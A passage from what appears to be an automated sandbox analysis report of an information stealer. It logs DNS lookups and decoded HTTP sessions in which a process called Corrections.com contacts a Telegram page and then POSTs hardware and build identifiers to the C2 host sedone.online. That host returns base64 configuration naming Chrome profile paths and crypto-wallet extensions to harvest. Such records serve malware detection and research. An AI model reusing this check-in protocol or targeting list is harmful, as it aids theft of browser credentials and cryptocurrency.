                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:44.936885118 CET44349893116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:44.936913013 CET49893443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:44.936920881 CET44349893116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:45.586613894 CET49899443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:45.586664915 CET44349899116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:45.586802006 CET49899443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:45.587095022 CET49899443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:45.587124109 CET44349899116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:45.971899986 CET44349893116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:45.972090006 CET44349893116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:45.972307920 CET49893443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:45.972307920 CET49893443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:45.973120928 CET49893443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:45.973134041 CET44349893116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:47.002624035 CET44349899116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:47.002796888 CET49899443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:47.003350019 CET49899443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:47.003362894 CET44349899116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:47.004856110 CET49899443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:47.004863977 CET44349899116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:47.874492884 CET44349899116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:47.874584913 CET49899443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:47.874609947 CET44349899116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:47.874660015 CET49899443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:47.874679089 CET44349899116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:47.874742985 CET49899443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:47.875586033 CET49899443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:47.875597000 CET44349899116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:48.632858992 CET49905443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:48.632916927 CET44349905116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:48.632978916 CET49905443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:48.633172989 CET49905443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:48.633203030 CET44349905116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:50.235622883 CET44349905116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:50.235802889 CET49905443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:50.236171961 CET49905443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:50.236181974 CET44349905116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:50.237603903 CET49905443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:50.237610102 CET44349905116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:51.195442915 CET44349905116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:51.195614100 CET44349905116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:51.195689917 CET49905443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:51.195830107 CET49905443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:51.195837021 CET44349905116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:51.196991920 CET49912443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:51.197032928 CET44349912116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:51.197611094 CET49912443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:51.197844028 CET49912443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:51.197865009 CET44349912116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:52.605247021 CET44349912116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:52.605446100 CET49912443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:52.605791092 CET49912443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:52.605806112 CET44349912116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:52.607379913 CET49912443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:52.607388020 CET44349912116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:53.504753113 CET44349912116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:53.504854918 CET49912443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:53.504877090 CET44349912116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:53.504924059 CET49912443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:53.504930019 CET44349912116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:53.504981041 CET49912443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:53.505065918 CET49912443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:48:53.505074978 CET44349912116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:05.861260891 CET6449653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:06.100723028 CET53644961.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:20.568306923 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:25.250130892 CET6254153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:25.387624025 CET53625411.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.494230032 CET5734453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.639161110 CET53573441.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:43.970043898 CET53521091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:43.999767065 CET53557331.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:44.028315067 CET6045753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:44.028465986 CET5540853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:44.165957928 CET53604571.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:44.165991068 CET53554081.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:46.856911898 CET53579951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:48.794003963 CET53571501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:05.861260891 CET192.168.2.41.1.1.10x164cStandard query (0)pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:25.250130892 CET192.168.2.41.1.1.10x1760Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.494230032 CET192.168.2.41.1.1.10xa7f0Standard query (0)sedone.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:44.028315067 CET192.168.2.41.1.1.10x3b7eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:44.028465986 CET192.168.2.41.1.1.10xdbbcStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:06.100723028 CET1.1.1.1192.168.2.40x164cName error (3)pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:25.387624025 CET1.1.1.1192.168.2.40x1760No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.639161110 CET1.1.1.1192.168.2.40xa7f0No error (0)sedone.online116.203.12.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:44.165957928 CET1.1.1.1192.168.2.40x3b7eNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:44.165991068 CET1.1.1.1192.168.2.40xdbbcNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          • t.me
                                                                                                                                                                                                                                                                                          • sedone.online
                                                                                                                                                                                                                                                                                          • www.google.com
                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          0192.168.2.449738149.154.167.994435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:27 UTC86OUTGET /detct0r HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: t.me
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:27 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:47:27 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                          Content-Length: 12324
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Set-Cookie: stel_ssid=cd7e238704795b0487_13694261222075210428; expires=Mon, 16 Dec 2024 19:47:27 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Cache-control: no-store
                                                                                                                                                                                                                                                                                          X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:27 UTC12324INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 64 65 74 63 74 30 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          1192.168.2.449740116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:29 UTC233OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:47:30 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          2192.168.2.449741116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:31 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----7G4WBI5PPH4E3EUS00HD
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 256
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:31 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 37 47 34 57 42 49 35 50 50 48 34 45 33 45 55 53 30 30 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 35 38 38 39 44 41 34 35 30 44 32 38 36 35 38 36 36 33 30 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 37 47 34 57 42 49 35 50 50 48 34 45 33 45 55 53 30 30 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 37 47 34 57 42 49 35 50 50 48 34 45 33 45 55 53 30 30 48 44 2d 2d 0d
                                                                                                                                                                                                                                                                                          Data Ascii: ------7G4WBI5PPH4E3EUS00HDContent-Disposition: form-data; name="hwid"D65889DA450D2865866309-a33c7340-61ca------7G4WBI5PPH4E3EUS00HDContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------7G4WBI5PPH4E3EUS00HD--
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:47:32 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:32 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 3a1|1|1|1|f6e3068fca5959a39c6a927e77fa1ae2|1|0|1|1|0|50000|00


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          3192.168.2.449742116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:33 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ASR1DBSJMYMYM7QI5FCJ
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:33 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 53 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 41 53 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 41 53 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------ASR1DBSJMYMYM7QI5FCJContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------ASR1DBSJMYMYM7QI5FCJContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------ASR1DBSJMYMYM7QI5FCJCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:47:34 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:34 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                          Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          4192.168.2.449743116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:36 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----58GVK6XT2VAAAIE3O8Y5
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:36 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 35 38 47 56 4b 36 58 54 32 56 41 41 41 49 45 33 4f 38 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 35 38 47 56 4b 36 58 54 32 56 41 41 41 49 45 33 4f 38 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 35 38 47 56 4b 36 58 54 32 56 41 41 41 49 45 33 4f 38 59 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------58GVK6XT2VAAAIE3O8Y5Content-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------58GVK6XT2VAAAIE3O8Y5Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------58GVK6XT2VAAAIE3O8Y5Cont
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:47:36 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:37 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                          Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          5192.168.2.449744116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:47:38 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----WL68Q90R9H47QI5FKFUK
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
